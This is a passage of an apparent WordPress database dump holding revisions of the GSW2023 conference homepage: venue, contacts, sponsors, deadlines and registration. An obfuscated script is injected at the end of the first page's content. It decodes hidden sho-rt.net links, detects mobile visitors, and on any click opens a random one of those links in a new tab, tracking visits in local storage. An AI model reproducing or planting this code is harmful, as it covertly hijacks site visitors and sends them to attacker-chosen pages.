!important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-22 12:47:10','2023-04-22 12:47:10','',3066,'https://gsw2023.com/?p=4094',0,'revision','',0),
(4095,1,'2023-04-22 12:47:24','2023-04-22 12:47:24','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1682167355428{margin-top: 20px !important;}\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1682167638505{margin-top: -25px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span 